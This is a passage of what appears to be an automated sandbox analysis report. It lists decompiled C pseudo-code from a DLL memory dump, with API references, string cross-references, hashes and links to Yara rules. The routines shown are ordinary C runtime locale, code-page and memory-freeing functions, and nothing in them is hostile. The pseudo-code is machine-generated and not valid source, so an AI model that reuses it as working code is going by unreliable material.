					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e20e03b
					E6E21E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e20e03b
						E6E21E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e20e03b
						E6E21E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e232dec; // 0x41
						_t77 = E6E21E68F(_t99, "t!#nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E21E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E1DF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2145D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E225124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E21E112(_t92, _t99,  &_v20);
						} else {
							E6E21E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x6e21e6fb
0x6e21e702
0x6e21e702
0x6e21e706
0x6e21e70a
0x6e21e718
0x6e21e71d
0x6e21e71e
0x6e21e71f
0x6e21e720
0x6e21e725
0x6e21e728
0x6e21e72a
0x6e21e730
0x6e21e736
0x6e21e739
0x6e21e73b
0x6e21e73e
0x6e21e742
0x6e21e749
0x6e21e756
0x6e21e75b
0x6e21e75e
0x6e21e761
0x6e21e761
0x6e21e763
0x6e21e766
0x6e21e76a
0x6e21e7da
0x6e21e7dc
0x6e21e7de
0x6e21e7f1
0x6e21e7f1
0x6e21e7f8
0x6e21e7fe
0x6e21e801
0x00000000
0x6e21e801
0x6e21e7e0
0x6e21e7e3
0x00000000
0x00000000
0x6e21e7e5
0x6e21e7e9
0x6e21e7ee
0x00000000
0x6e21e771
0x6e21e771
0x6e21e775
0x6e21e787
0x6e21e78b
0x6e21e77c
0x6e21e77c
0x6e21e780
0x6e21e780
0x6e21e794
0x6e21e795
0x6e21e81f
0x6e21e81f
0x00000000
0x6e21e79b
0x6e21e79b
0x6e21e7aa
0x6e21e7af
0x6e21e7b4
0x6e21e804
0x6e21e804
0x6e21e804
0x6e21e806
0x6e21e80a
0x6e21e821
0x6e21e82d
0x6e21e837
0x6e21e83a
0x6e21e83b
0x6e21e83d
0x00000000
0x00000000
0x6e21e83f
0x6e21e845
0x00000000
0x00000000
0x6e21e847
0x6e21e84d
0x00000000
0x00000000
0x6e21e853
0x6e21e859
0x6e21e85b
0x00000000
0x00000000
0x6e21e862
0x6e21e868
0x6e21e86a
0x00000000
0x00000000
0x6e21e86c
0x6e21e86f
0x6e21e871
0x6e21e873
0x6e21e873
0x6e21e884
0x6e21e889
0x6e21e88b
0x6e21e8eb
0x6e21e80e
0x6e21e81e
0x6e21e81e
0x6e21e89a
0x6e21e8aa
0x6e21e8b0
0x6e21e8b2
0x00000000
0x00000000
0x6e21e8c9
0x6e21e8cf
0x6e21e8d1
0x00000000
0x00000000
0x6e21e8e3
0x00000000
0x6e21e8e8
0x6e21e80c
0x00000000
0x6e21e80c
0x6e21e7b6
0x6e21e7b8
0x6e21e7bc
0x6e21e7d2
0x6e21e7c3
0x6e21e7c7
0x6e21e7c7
0x6e21e7d7
0x00000000
0x6e21e7d7
0x6e21e795

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D65E
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E21E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6E21E853
IsValidLocale.KERNEL32(?,00000001), ref: 6E21E862
GetLocaleInfoW.KERNEL32(?,00001001,; n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E21E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E21E8C9

Strings

t!#nE, xrefs: 6E21E7A5
; n, xrefs: 6E21E7C3, 6E21E821, 6E21E7CE
; n, xrefs: 6E21E715, 6E21E725, 6E21E7E5, 6E21E787, 6E21E77C, 6E21E77F, 6E21E78A, 6E21E7E8
; n, xrefs: 6E21E702, 6E21E8A1
)#nU, xrefs: 6E21E751

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )#nU$; n$; n$; n$t!#nE
API String ID: 745075371-3664795132
Opcode ID: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction ID: 677d63c20cf54e1ffeb371a4d9de909f5c362a466d7101c1f585acfbdf4452df
Opcode Fuzzy Hash: 7918e64115b843f4d7288de4cca1cc8592f7c53be77f0bfec296359a968c75d6
Instruction Fuzzy Hash: DD517B7290420FAFEB50DFE5CC44AEA77FAAF05701F154529EA20EB590E7709A418B61

Uniqueness

Uniqueness Score: -1.00%

Function 6E21DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E21DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E20D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E21DD27(" )#nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E21D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E21D775();
					} else {
						E6E21D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E21DD27("t!#nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E21D775();
							} else {
								E6E21D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E21DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e20e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E21D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E202188();
								asm("int3");
								_t132 = _t134;
								_v52 =  *0x6e28506c ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E20D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E20D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E21E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E21806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E21E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E1DF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E214323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E214323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E227BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E214323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E227BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E225124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x6e21dd96
0x6e21dd9b
0x6e21dd9c
0x6e21dd9d
0x6e21dd9f
0x6e21dda0
0x6e21dda5
0x6e21dda8
0x6e21ddaa
0x6e21ddad
0x6e21ddad
0x6e21ddb0
0x6e21ddb0
0x6e21ddb6
0x6e21ddb9
0x6e21ddbc
0x6e21ddbc
0x6e21ddbf
0x6e21ddc2
0x6e21ddc8
0x6e21ddca
0x6e21ddcf
0x6e21ddd9
0x6e21ddde
0x6e21dde1
0x6e21dde1
0x6e21dde5
0x6e21dde9
0x6e21de32
0x00000000
0x6e21ddeb
0x6e21ddf0
0x6e21ddf9
0x6e21ddf2
0x6e21ddf2
0x6e21ddf2
0x6e21de00
0x6e21de04
0x6e21de0e
0x6e21de13
0x6e21de18
0x6e21de1e
0x6e21de22
0x6e21de2b
0x6e21de24
0x6e21de24
0x6e21de24
0x6e21de37
0x6e21de37
0x6e21de37
0x6e21de18
0x6e21de04
0x6e21de3d
0x6e21df4f
0x6e21df4f
0x6e21df4f
0x00000000
0x6e21de43
0x6e21de50
0x6e21de56
0x00000000
0x6e21de86
0x6e21de86
0x6e21de8b
0x6e21de8d
0x6e21de8d
0x6e21de8f
0x6e21de8f
0x6e21de94
0x6e21df4a
0x6e21df4c
0x00000000
0x6e21de9a
0x6e21de9a
0x6e21de9d
0x6e21dea5
0x6e21dea8
0x6e21deab
0x6e21deab
0x6e21deae
0x6e21deb1
0x6e21deb9
0x6e21debe
0x6e21dec5
0x6e21deca
0x6e21decd
0x6e21decf
0x6e21df5a
0x6e21df5b
0x6e21df5c
0x6e21df5d
0x6e21df5e
0x6e21df5f
0x6e21df64
0x6e21df68
0x6e21df77
0x6e21df7a
0x6e21df7b
0x6e21df7f
0x6e21df85
0x6e21df8d
0x6e21df9c
0x6e21dfa8
0x6e21dfb9
0x6e21dfbf
0x6e21dfc1
0x6e21dfd2
0x6e21dfd9
0x6e21dfdb
0x6e21dfde
0x6e21dfe4
0x6e21dfe6
0x6e21dfe8
0x6e21dfe8
0x6e21dfeb
0x6e21dfee
0x6e21dfee
0x6e21dfe6
0x6e21dff8
0x6e21dfc3
0x6e21dfc3
0x6e21dfc5
0x6e21dfff
0x6e21e000
0x6e21e00b
0x6e21ded5
0x6e21dede
0x6e21dee3
0x6e21dee5
0x00000000
0x6e21dee7
0x6e21dee9
0x6e21df03
0x00000000
0x6e21df05
0x6e21df05
0x6e21df08
0x6e21df0e
0x6e21df11
0x6e21df21
0x6e21df34
0x00000000
0x00000000
0x00000000
0x00000000
0x6e21df13
0x6e21df13
0x6e21df16
0x6e21df1c
0x6e21df1d
0x6e21df1f
0x6e21df36
0x6e21df42
0x00000000
0x00000000
0x00000000
0x00000000
0x6e21df1f
0x6e21df11
0x6e21df03
0x6e21df51
0x6e21df57
0x6e21df57
0x6e21decf
0x6e21de94
0x6e21de56

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,?), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E20E042,?,?,?,?,6E20DA1E,?,00000004), ref: 6E21DE78
_wcschr.LIBVCRUNTIME ref: 6E21DF08
_wcschr.LIBVCRUNTIME ref: 6E21DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B n,00000000,?), ref: 6E21DFB9

Strings

t!#nE, xrefs: 6E21DE09
)#nU, xrefs: 6E21DDD4
B n, xrefs: 6E21DE8F, 6E21DED7, 6E21DF7F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )#nU$B n$t!#nE
API String ID: 4212172061-4144220597
Opcode ID: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction ID: bbbab55976af9d5c1a7ffe5aa649fe409673dd482c809d4b8049263cb240cde8
Opcode Fuzzy Hash: 6757db110dfd2b23916a57cf028d6f9966738da2931647a5005137c17de45bbd
Instruction Fuzzy Hash: 8661D47650824FEBEB149BB5CC45BE773EEEF05706F100869EA199B180EB70E7418B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E21E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E21E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e21e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e232f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e232f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E20BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e21e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E21E837,?,00000000), ref: 6E21E5DA
GetACP.KERNEL32(?,?,6E21E837,?,00000000), ref: 6E21E5EF

Strings

7!n, xrefs: 6E21E5CF, 6E21E5A6
OCP, xrefs: 6E21E56C
ACP, xrefs: 6E21E536

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: 7!n$ACP$OCP
API String ID: 2299586839-4196688072
Opcode ID: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction ID: 8a2673a683c2d79cb7e5ebb185317e206550357095f6e925e7dbae220fd6e587
Opcode Fuzzy Hash: 454be04db5065429e1aec12d0171cd7070d5a62cee135b8deba0232cdc0be799
Instruction Fuzzy Hash: 33219F6261810EBBE7548FD9CD05BC777F7AB45B25B568414EA0AC7904F722DB40C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2850b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E20CBD3(_t46);
							E6E21C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E20CBD3(_t47);
							E6E21CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E20CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E20CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E21C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2852b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E20CBD3(_t31);
							E6E20CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E20CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E20CBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6E21BFA8

Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7EC
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7FE
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C810
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C822
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C834
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C846
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C858
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C86A
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C87C
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C88E
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8A0
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8B2
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8C4

_free.LIBCMT ref: 6E21BF9D

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21BFBF
_free.LIBCMT ref: 6E21BFD4
_free.LIBCMT ref: 6E21BFDF
_free.LIBCMT ref: 6E21C001
_free.LIBCMT ref: 6E21C014
_free.LIBCMT ref: 6E21C022
_free.LIBCMT ref: 6E21C02D
_free.LIBCMT ref: 6E21C065
_free.LIBCMT ref: 6E21C06C
_free.LIBCMT ref: 6E21C089
_free.LIBCMT ref: 6E21C0A1

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction ID: e17b0c478c9c3151b25e56ba352149982991586cd884885720d8e47ced67a47b
Opcode Fuzzy Hash: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction Fuzzy Hash: 8231607550830E9FE7549AB4D842BDB73FBAF00B15F204829E159DB2A5EF71AA408B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E21877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E21877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E21822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E218289( &_v8) != 0 || E6E218231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E21822B();
					_t32 =  &_v52; // 0x6e232130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E218289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E202188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_v100 =  *0x6e28506c ^ _t192;
						 *0x6e285384 =  *0x6e285384 | 0xffffffff;
						 *0x6e285378 =  *0x6e285378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e287a10 = 0;
						_t78 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e232130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E20F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E211216(0x6e232130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e232130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E20CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E20CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
